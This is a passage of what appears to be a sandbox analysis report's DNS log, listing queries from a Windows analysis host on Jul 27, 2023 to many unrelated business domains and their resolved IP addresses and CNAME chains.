                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.244219065 CEST192.168.2.48.8.8.80x7f7Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.262139082 CEST192.168.2.48.8.8.80xd94fStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:46.349802971 CEST192.168.2.48.8.8.80xf605Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.089019060 CEST8.8.8.8192.168.2.40xa07aNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.089019060 CEST8.8.8.8192.168.2.40xa07aNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.101058960 CEST8.8.8.8192.168.2.40xd729No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.102539062 CEST8.8.8.8192.168.2.40x4034No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.102539062 CEST8.8.8.8192.168.2.40x4034No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.106435061 CEST8.8.8.8192.168.2.40xe878No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.106435061 CEST8.8.8.8192.168.2.40xe878No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.108764887 CEST8.8.8.8192.168.2.40x9fe4No error (0)www.ftchat.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.108764887 CEST8.8.8.8192.168.2.40x9fe4No error (0)www.ftchat.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.121567965 CEST8.8.8.8192.168.2.40x7da7No error (0)www.pdqhomes.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.121567965 CEST8.8.8.8192.168.2.40x7da7No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.121567965 CEST8.8.8.8192.168.2.40x7da7No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.121567965 CEST8.8.8.8192.168.2.40x7da7No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.125341892 CEST8.8.8.8192.168.2.40xe5ecNo error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.125341892 CEST8.8.8.8192.168.2.40xe5ecNo error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.141752958 CEST8.8.8.8192.168.2.40xf64dNo error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.141752958 CEST8.8.8.8192.168.2.40xf64dNo error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.150803089 CEST8.8.8.8192.168.2.40x498dNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.183325052 CEST8.8.8.8192.168.2.40x919aNo error (0)www.wkhk.net206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.516772985 CEST8.8.8.8192.168.2.40xa58bNo error (0)www.alteor.clcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.516772985 CEST8.8.8.8192.168.2.40xa58bNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.516772985 CEST8.8.8.8192.168.2.40xa58bNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.520711899 CEST8.8.8.8192.168.2.40xb1efNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.520711899 CEST8.8.8.8192.168.2.40xb1efNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.520711899 CEST8.8.8.8192.168.2.40xb1efNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.531820059 CEST8.8.8.8192.168.2.40xfb5dNo error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.531820059 CEST8.8.8.8192.168.2.40xfb5dNo error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.801332951 CEST8.8.8.8192.168.2.40x300fNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.801332951 CEST8.8.8.8192.168.2.40x300fNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:20.801332951 CEST8.8.8.8192.168.2.40x300fNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.272461891 CEST8.8.8.8192.168.2.40xb9fdNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.278541088 CEST8.8.8.8192.168.2.40xdd4dNo error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.278541088 CEST8.8.8.8192.168.2.40xdd4dNo error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.278541088 CEST8.8.8.8192.168.2.40xdd4dNo error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.312666893 CEST8.8.8.8192.168.2.40x28cdNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.312666893 CEST8.8.8.8192.168.2.40x28cdNo error (0)ghs.googlehosted.com172.217.16.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.371293068 CEST8.8.8.8192.168.2.40x5697Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.371345997 CEST8.8.8.8192.168.2.40xe6ffNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.386655092 CEST8.8.8.8192.168.2.40x330bNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.386655092 CEST8.8.8.8192.168.2.40x330bNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.386681080 CEST8.8.8.8192.168.2.40x8dd5No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.386681080 CEST8.8.8.8192.168.2.40x8dd5No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.453605890 CEST8.8.8.8192.168.2.40x3be4No error (0)www.petsfan.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.453605890 CEST8.8.8.8192.168.2.40x3be4No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.453605890 CEST8.8.8.8192.168.2.40x3be4No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.453605890 CEST8.8.8.8192.168.2.40x3be4No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.704401016 CEST8.8.8.8192.168.2.40xde79No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.704401016 CEST8.8.8.8192.168.2.40xde79No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.716588974 CEST8.8.8.8192.168.2.40xa687No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.776977062 CEST8.8.8.8192.168.2.40x4b52No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.776977062 CEST8.8.8.8192.168.2.40x4b52No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:21.776977062 CEST8.8.8.8192.168.2.40x4b52No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.167462111 CEST8.8.8.8192.168.2.40x6a62No error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.167462111 CEST8.8.8.8192.168.2.40x6a62No error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.254460096 CEST8.8.8.8192.168.2.40x4f45No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.254460096 CEST8.8.8.8192.168.2.40x4f45No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.254460096 CEST8.8.8.8192.168.2.40x4f45No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.258805037 CEST8.8.8.8192.168.2.40x741bNo error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.308303118 CEST8.8.8.8192.168.2.40x27e5No error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.356688023 CEST8.8.8.8192.168.2.40x7f5eName error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.367094994 CEST8.8.8.8192.168.2.40x7e03No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.367094994 CEST8.8.8.8192.168.2.40x7e03No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.429735899 CEST8.8.8.8192.168.2.40x951cNo error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.433712006 CEST8.8.8.8192.168.2.40x3262No error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.433712006 CEST8.8.8.8192.168.2.40x3262No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.501022100 CEST8.8.8.8192.168.2.40xb583No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.501022100 CEST8.8.8.8192.168.2.40xb583No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.509340048 CEST8.8.8.8192.168.2.40x3071No error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.509340048 CEST8.8.8.8192.168.2.40x3071No error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.833410025 CEST8.8.8.8192.168.2.40x26f4No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.833410025 CEST8.8.8.8192.168.2.40x26f4No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.878017902 CEST8.8.8.8192.168.2.40x9ba3No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.878017902 CEST8.8.8.8192.168.2.40x9ba3No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.948582888 CEST8.8.8.8192.168.2.40x4873No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.948582888 CEST8.8.8.8192.168.2.40x4873No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.953949928 CEST8.8.8.8192.168.2.40x7fdeNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.953949928 CEST8.8.8.8192.168.2.40x7fdeNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.963885069 CEST8.8.8.8192.168.2.40xb3aaNo error (0)www.cokocoko.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.963885069 CEST8.8.8.8192.168.2.40xb3aaNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.963885069 CEST8.8.8.8192.168.2.40xb3aaNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:22.963885069 CEST8.8.8.8192.168.2.40xb3aaNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.367897987 CEST8.8.8.8192.168.2.40xfb5dNo error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.367897987 CEST8.8.8.8192.168.2.40xfb5dNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:23.367897987 CEST8.8.8.8192.168.2.40xfb5dNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.154648066 CEST8.8.8.8192.168.2.40xbaf4Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.164295912 CEST8.8.8.8192.168.2.40x367eNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.167435884 CEST8.8.8.8192.168.2.40x711dNo error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.172811031 CEST8.8.8.8192.168.2.40xfbd6No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.197586060 CEST8.8.8.8192.168.2.40x6190No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.209948063 CEST8.8.8.8192.168.2.40xcf0dNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.209948063 CEST8.8.8.8192.168.2.40xcf0dNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.278167963 CEST8.8.8.8192.168.2.40x63f6No error (0)www.maktraxx.commaktraxx.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.278167963 CEST8.8.8.8192.168.2.40x63f6No error (0)maktraxx.com72.44.93.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.287231922 CEST8.8.8.8192.168.2.40x6f26No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.360857010 CEST8.8.8.8192.168.2.40x6a42No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.696280003 CEST8.8.8.8192.168.2.40xa6baNo error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.696280003 CEST8.8.8.8192.168.2.40xa6baNo error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.746084929 CEST8.8.8.8192.168.2.40xdc6eNo error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.746084929 CEST8.8.8.8192.168.2.40xdc6eNo error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.864274979 CEST8.8.8.8192.168.2.40xca00No error (0)www.netcr.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.864274979 CEST8.8.8.8192.168.2.40xca00No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.864274979 CEST8.8.8.8192.168.2.40xca00No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.864274979 CEST8.8.8.8192.168.2.40xca00No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.873447895 CEST8.8.8.8192.168.2.40x2e16No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:24.993602037 CEST8.8.8.8192.168.2.40x8ae7No error (0)www.cel-cpa.com104.196.26.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.112365961 CEST8.8.8.8192.168.2.40xab38No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.151786089 CEST8.8.8.8192.168.2.40xd4d8No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.406326056 CEST8.8.8.8192.168.2.40xa3b5No error (0)www.snugpak.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.406326056 CEST8.8.8.8192.168.2.40xa3b5No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.441420078 CEST8.8.8.8192.168.2.40x92a1No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.441420078 CEST8.8.8.8192.168.2.40x92a1No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.466451883 CEST8.8.8.8192.168.2.40xf0dNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.466451883 CEST8.8.8.8192.168.2.40xf0dNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.466451883 CEST8.8.8.8192.168.2.40xf0dNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.961535931 CEST8.8.8.8192.168.2.40x2f96No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.970938921 CEST8.8.8.8192.168.2.40xbc36No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.970938921 CEST8.8.8.8192.168.2.40xbc36No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.979044914 CEST8.8.8.8192.168.2.40x551No error (0)www.fe-bauer.de3.65.101.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.998193026 CEST8.8.8.8192.168.2.40x155aNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.998193026 CEST8.8.8.8192.168.2.40x155aNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.998193026 CEST8.8.8.8192.168.2.40x155aNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.998193026 CEST8.8.8.8192.168.2.40x155aNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.998193026 CEST8.8.8.8192.168.2.40x155aNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:25.998193026 CEST8.8.8.8192.168.2.40x155aNo error (0)d2kt7vovxa5e81.cloudfront.net13.224.103.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.386405945 CEST8.8.8.8192.168.2.40xa011No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.552802086 CEST8.8.8.8192.168.2.40xcf07No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.603552103 CEST8.8.8.8192.168.2.40x3f98No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.650868893 CEST8.8.8.8192.168.2.40x4df4No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.650868893 CEST8.8.8.8192.168.2.40x4df4No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.650868893 CEST8.8.8.8192.168.2.40x4df4No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:26.665498972 CEST8.8.8.8192.168.2.40x8024No error (0)www.koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.324575901 CEST8.8.8.8192.168.2.40x6f26No error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.844455957 CEST8.8.8.8192.168.2.40xd90fNo error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.844455957 CEST8.8.8.8192.168.2.40xd90fNo error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.844455957 CEST8.8.8.8192.168.2.40xd90fNo error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.844455957 CEST8.8.8.8192.168.2.40xd90fNo error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:27.844455957 CEST8.8.8.8192.168.2.40xd90fNo error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.0.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:28.052304029 CEST8.8.8.8192.168.2.40x78eNo error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:28.248480082 CEST8.8.8.8192.168.2.40x2df2No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:29.687077999 CEST8.8.8.8192.168.2.40xb1f6No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:30.356775045 CEST8.8.8.8192.168.2.40x4023No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:42.232367992 CEST8.8.8.8192.168.2.40x502eNo error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:42.232367992 CEST8.8.8.8192.168.2.40x502eNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:42.232367992 CEST8.8.8.8192.168.2.40x502eNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:42.232367992 CEST8.8.8.8192.168.2.40x502eNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:42.232367992 CEST8.8.8.8192.168.2.40x502eNo error (0)d2r2uj0bnofxxz.cloudfront.net18.165.183.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:43.586571932 CEST8.8.8.8192.168.2.40x25ccNo error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
